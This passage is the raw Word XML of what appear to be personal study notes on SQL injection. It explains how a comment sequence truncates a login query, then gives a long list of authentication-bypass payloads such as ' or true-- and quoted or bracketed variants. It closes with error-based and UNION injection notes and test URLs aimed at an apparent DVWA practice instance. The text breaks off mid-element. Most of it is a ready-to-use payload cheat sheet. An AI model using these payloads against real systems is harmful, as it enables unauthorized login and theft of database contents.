    <w:p w14:paraId="112C9715" w14:textId="00BF841A" w:rsidR="00275D19" w:rsidRPr="00275D19" w:rsidRDefault="00275D19" w:rsidP="00275D19">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00275D19">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">select </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00275D19">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>username,pass</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00275D19">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> from users where username='' or true--' and password='' or ''='' limit 0,1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="599D6BF4" w14:textId="4E3B935D" w:rsidR="00275D19" w:rsidRPr="00275D19" w:rsidRDefault="00275D19" w:rsidP="00275D19">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00275D19">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Here anything after -- </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00275D19">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>wont</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00275D19">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> be executed which makes the query to be:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F605793" w14:textId="5E914049" w:rsidR="00275D19" w:rsidRPr="00275D19" w:rsidRDefault="00275D19" w:rsidP="00275D19">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00275D19">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">&gt; select </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00275D19">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>username,pass</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00275D19">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> from users where username='' or true;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E0C7ABE" w14:textId="77777777" w:rsidR="00275D19" w:rsidRDefault="00275D19" w:rsidP="00275D19">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00275D19">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Injections:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="374E19DD" w14:textId="612B810C" w:rsidR="00275D19" w:rsidRPr="00275D19" w:rsidRDefault="00275D19" w:rsidP="00275D19">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>___________________________________________________________________________</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FCDAAC7" w14:textId="77777777" w:rsidR="00275D19" w:rsidRPr="00275D19" w:rsidRDefault="00275D19" w:rsidP="00275D19">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00275D19">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>') or true--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="401D99E4" w14:textId="77777777" w:rsidR="00275D19" w:rsidRPr="00275D19" w:rsidRDefault="00275D19" w:rsidP="00275D19">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00275D19">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>') or ('')=('</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA59492" w14:textId="77777777" w:rsidR="00275D19" w:rsidRPr="00275D19" w:rsidRDefault="00275D19" w:rsidP="00275D19">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00275D19">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>') or 1--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D418F96" w14:textId="77777777" w:rsidR="00275D19" w:rsidRPr="00275D19" w:rsidRDefault="00275D19" w:rsidP="00275D19">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00275D19">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>') or ('x')=('</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="672E5292" w14:textId="77777777" w:rsidR="00275D19" w:rsidRPr="00275D19" w:rsidRDefault="00275D19" w:rsidP="00275D19">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00275D19">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>" or true--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77228626" w14:textId="77777777" w:rsidR="00275D19" w:rsidRPr="00275D19" w:rsidRDefault="00275D19" w:rsidP="00275D19">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00275D19">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>" or ""="</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02815B37" w14:textId="77777777" w:rsidR="00275D19" w:rsidRPr="00275D19" w:rsidRDefault="00275D19" w:rsidP="00275D19">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00275D19">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>" or 1--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="379506C0" w14:textId="77777777" w:rsidR="00275D19" w:rsidRPr="00275D19" w:rsidRDefault="00275D19" w:rsidP="00275D19">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00275D19">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>" or "x"="</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B30CF50" w14:textId="77777777" w:rsidR="00275D19" w:rsidRPr="00275D19" w:rsidRDefault="00275D19" w:rsidP="00275D19">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00275D19">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>") or true--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A8E1F8E" w14:textId="77777777" w:rsidR="00275D19" w:rsidRPr="00275D19" w:rsidRDefault="00275D19" w:rsidP="00275D19">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00275D19">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>") or ("")=("</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="495D6F37" w14:textId="77777777" w:rsidR="00275D19" w:rsidRPr="00275D19" w:rsidRDefault="00275D19" w:rsidP="00275D19">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00275D19">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>") or 1--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="208068A6" w14:textId="77777777" w:rsidR="00275D19" w:rsidRPr="00275D19" w:rsidRDefault="00275D19" w:rsidP="00275D19">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00275D19">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>") or ("x")=("</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="793B6FB5" w14:textId="77777777" w:rsidR="00275D19" w:rsidRPr="00275D19" w:rsidRDefault="00275D19" w:rsidP="00275D19">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00275D19">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>')) or true--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="783976ED" w14:textId="77777777" w:rsidR="00275D19" w:rsidRPr="00275D19" w:rsidRDefault="00275D19" w:rsidP="00275D19">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00275D19">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>')) or ((''))=(('</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F944BD2" w14:textId="77777777" w:rsidR="00275D19" w:rsidRPr="00275D19" w:rsidRDefault="00275D19" w:rsidP="00275D19">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00275D19">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>')) or 1--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072D9C85" w14:textId="77777777" w:rsidR="00275D19" w:rsidRPr="00275D19" w:rsidRDefault="00275D19" w:rsidP="00275D19">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00275D19">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>')) or (('x'))=(('</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BDA5D00" w14:textId="77777777" w:rsidR="00275D19" w:rsidRPr="00275D19" w:rsidRDefault="00275D19" w:rsidP="00275D19">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00275D19">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>'-'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="032EBC2B" w14:textId="77777777" w:rsidR="00275D19" w:rsidRPr="00275D19" w:rsidRDefault="00275D19" w:rsidP="00275D19">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00275D19">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>' '</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F57824" w14:textId="77777777" w:rsidR="00275D19" w:rsidRPr="00275D19" w:rsidRDefault="00275D19" w:rsidP="00275D19">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00275D19">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>'&amp;'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E0ED19A" w14:textId="77777777" w:rsidR="00275D19" w:rsidRPr="00275D19" w:rsidRDefault="00275D19" w:rsidP="00275D19">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00275D19">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>'^'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="698BC73A" w14:textId="77777777" w:rsidR="00275D19" w:rsidRPr="00275D19" w:rsidRDefault="00275D19" w:rsidP="00275D19">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00275D19">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>'*'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3266E472" w14:textId="77777777" w:rsidR="00275D19" w:rsidRPr="00275D19" w:rsidRDefault="00275D19" w:rsidP="00275D19">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00275D19">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>' or ''-'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3056C43A" w14:textId="77777777" w:rsidR="00275D19" w:rsidRPr="00275D19" w:rsidRDefault="00275D19" w:rsidP="00275D19">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00275D19">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>' or '' '</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB2C49B" w14:textId="77777777" w:rsidR="00275D19" w:rsidRPr="00275D19" w:rsidRDefault="00275D19" w:rsidP="00275D19">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00275D19">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>' or ''&amp;'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="642D387C" w14:textId="77777777" w:rsidR="00275D19" w:rsidRPr="00275D19" w:rsidRDefault="00275D19" w:rsidP="00275D19">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00275D19">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>' or ''^'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35DCE682" w14:textId="77777777" w:rsidR="00275D19" w:rsidRPr="00275D19" w:rsidRDefault="00275D19" w:rsidP="00275D19">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00275D19">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>' or ''*'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7683CD8F" w14:textId="77777777" w:rsidR="00275D19" w:rsidRPr="00275D19" w:rsidRDefault="00275D19" w:rsidP="00275D19">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00275D19">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>"-"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3971D9F7" w14:textId="77777777" w:rsidR="00275D19" w:rsidRPr="00275D19" w:rsidRDefault="00275D19" w:rsidP="00275D19">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00275D19">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>" "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC3ABAD" w14:textId="77777777" w:rsidR="00275D19" w:rsidRPr="00275D19" w:rsidRDefault="00275D19" w:rsidP="00275D19">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00275D19">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>"&amp;"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="709DE89B" w14:textId="77777777" w:rsidR="00275D19" w:rsidRPr="00275D19" w:rsidRDefault="00275D19" w:rsidP="00275D19">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00275D19">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>"^"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F17D90" w14:textId="77777777" w:rsidR="00275D19" w:rsidRPr="00275D19" w:rsidRDefault="00275D19" w:rsidP="00275D19">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00275D19">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>"*"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F6AF5DF" w14:textId="77777777" w:rsidR="00275D19" w:rsidRPr="00275D19" w:rsidRDefault="00275D19" w:rsidP="00275D19">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00275D19">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>" or ""-"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75674FE3" w14:textId="77777777" w:rsidR="00275D19" w:rsidRPr="00275D19" w:rsidRDefault="00275D19" w:rsidP="00275D19">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00275D19">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>" or "" "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1770BC9D" w14:textId="77777777" w:rsidR="00275D19" w:rsidRPr="00275D19" w:rsidRDefault="00275D19" w:rsidP="00275D19">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00275D19">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>" or ""&amp;"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B00A455" w14:textId="77777777" w:rsidR="00275D19" w:rsidRPr="00275D19" w:rsidRDefault="00275D19" w:rsidP="00275D19">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00275D19">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>" or ""^"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42AD2DCA" w14:textId="77777777" w:rsidR="00275D19" w:rsidRPr="00275D19" w:rsidRDefault="00275D19" w:rsidP="00275D19">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00275D19">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>" or ""*"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C28138" w14:textId="77777777" w:rsidR="00275D19" w:rsidRPr="00275D19" w:rsidRDefault="00275D19" w:rsidP="00275D19">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00275D19">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>or true--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E3E4DD" w14:textId="77777777" w:rsidR="00275D19" w:rsidRPr="00275D19" w:rsidRDefault="00275D19" w:rsidP="00275D19">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00275D19">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>" or true--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49CFA982" w14:textId="77777777" w:rsidR="00275D19" w:rsidRPr="00275D19" w:rsidRDefault="00275D19" w:rsidP="00275D19">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00275D19">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>' or true--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA6B50C" w14:textId="77777777" w:rsidR="00275D19" w:rsidRPr="00275D19" w:rsidRDefault="00275D19" w:rsidP="00275D19">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00275D19">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>") or true--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C7C5884" w14:textId="77777777" w:rsidR="00275D19" w:rsidRPr="00275D19" w:rsidRDefault="00275D19" w:rsidP="00275D19">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00275D19">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>') or true--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="695C7A8B" w14:textId="77777777" w:rsidR="00275D19" w:rsidRPr="00275D19" w:rsidRDefault="00275D19" w:rsidP="00275D19">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00275D19">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>' or 'x'='x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD62859" w14:textId="77777777" w:rsidR="00275D19" w:rsidRPr="00275D19" w:rsidRDefault="00275D19" w:rsidP="00275D19">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00275D19">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>') or ('x')=('x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D6AFDC" w14:textId="77777777" w:rsidR="00275D19" w:rsidRPr="00275D19" w:rsidRDefault="00275D19" w:rsidP="00275D19">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00275D19">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>')) or (('x'))=(('x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24253003" w14:textId="77777777" w:rsidR="00275D19" w:rsidRPr="00275D19" w:rsidRDefault="00275D19" w:rsidP="00275D19">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00275D19">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>" or "x"="x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41AFB98F" w14:textId="77777777" w:rsidR="00275D19" w:rsidRPr="00275D19" w:rsidRDefault="00275D19" w:rsidP="00275D19">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00275D19">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>") or ("x")=("x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D6E84F5" w14:textId="77777777" w:rsidR="00275D19" w:rsidRDefault="00275D19" w:rsidP="00275D19">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00275D19">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>")) or (("x"))=(("x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44AF4A5B" w14:textId="418219D3" w:rsidR="00275D19" w:rsidRPr="00275D19" w:rsidRDefault="00275D19" w:rsidP="00275D19">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>___________________________________________________________________________</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="005E8F19" w14:textId="77777777" w:rsidR="00275D19" w:rsidRPr="00AB6A3F" w:rsidRDefault="00275D19" w:rsidP="003F2732">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6355382B" w14:textId="77777777" w:rsidR="0090433C" w:rsidRPr="0090433C" w:rsidRDefault="0090433C" w:rsidP="0090433C">
      <w:r w:rsidRPr="0090433C">
        <w:t>Error based injection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A5DEF9" w14:textId="10A74796" w:rsidR="0090433C" w:rsidRPr="0090433C" w:rsidRDefault="0090433C" w:rsidP="0090433C">
      <w:r w:rsidRPr="0090433C">
        <w:t>[1] Error</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F82236E" w14:textId="7C71F5E4" w:rsidR="0090433C" w:rsidRPr="0090433C" w:rsidRDefault="0090433C" w:rsidP="0090433C">
      <w:r w:rsidRPr="0090433C">
        <w:t>[UNION] Three basic rules of injecting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E961FAF" w14:textId="77777777" w:rsidR="0090433C" w:rsidRPr="0090433C" w:rsidRDefault="0090433C" w:rsidP="0090433C">
      <w:r w:rsidRPr="0090433C">
        <w:t>[1]. Balance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204A45A2" w14:textId="77777777" w:rsidR="0090433C" w:rsidRPr="0090433C" w:rsidRDefault="0090433C" w:rsidP="0090433C">
      <w:r w:rsidRPr="0090433C">
        <w:t>[2]. Inject.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05457A61" w14:textId="3201B2CF" w:rsidR="0090433C" w:rsidRDefault="0090433C" w:rsidP="0090433C">
      <w:r w:rsidRPr="0090433C">
        <w:t>[3]. Commenting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55748C04" w14:textId="6DE14C7A" w:rsidR="0090433C" w:rsidRPr="0090433C" w:rsidRDefault="0090433C" w:rsidP="0090433C">
      <w:r>
        <w:t>--------------------------------------------------------------------------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="312F9070" w14:textId="77777777" w:rsidR="0090433C" w:rsidRPr="0090433C" w:rsidRDefault="0090433C" w:rsidP="0090433C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0090433C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>[+] ERROR:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0757D17F" w14:textId="42AA0C51" w:rsidR="0090433C" w:rsidRPr="0090433C" w:rsidRDefault="0090433C" w:rsidP="0090433C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0090433C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>``````</w:t>
      </w:r>
      <w:r w:rsidRPr="0090433C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>``````````</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F0CB5F3" w14:textId="77777777" w:rsidR="0090433C" w:rsidRPr="0090433C" w:rsidRDefault="0090433C" w:rsidP="0090433C">
      <w:r w:rsidRPr="0090433C">
        <w:t>http://20.251.155.53:8080/vulnerabilities/sqli/?id=2&amp;Submit=Submit#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35AD09B0" w14:textId="77777777" w:rsidR="0090433C" w:rsidRPr="0090433C" w:rsidRDefault="0090433C" w:rsidP="0090433C">
      <w:r w:rsidRPr="0090433C">
        <w:t>Param: id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="659DF2C2" w14:textId="26F40ADF" w:rsidR="0090433C" w:rsidRPr="0090433C" w:rsidRDefault="0090433C" w:rsidP="0090433C">
      <w:r w:rsidRPr="0090433C">
        <w:t xml:space="preserve">payload: </w:t>
      </w:r>
      <w:r w:rsidRPr="0090433C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>char, -int, ', "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7776E18D" w14:textId="77777777" w:rsidR="0090433C" w:rsidRPr="0090433C" w:rsidRDefault="0090433C" w:rsidP="0090433C">
      <w:r w:rsidRPr="0090433C">
        <w:t>http://20.251.155.53:8080/vulnerabilities/sqli/?id=2'&amp;Submit=Submit#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B7DFB3" w14:textId="77777777" w:rsidR="0090433C" w:rsidRPr="0090433C" w:rsidRDefault="0090433C" w:rsidP="0090433C">
      <w:r w:rsidRPr="0090433C">
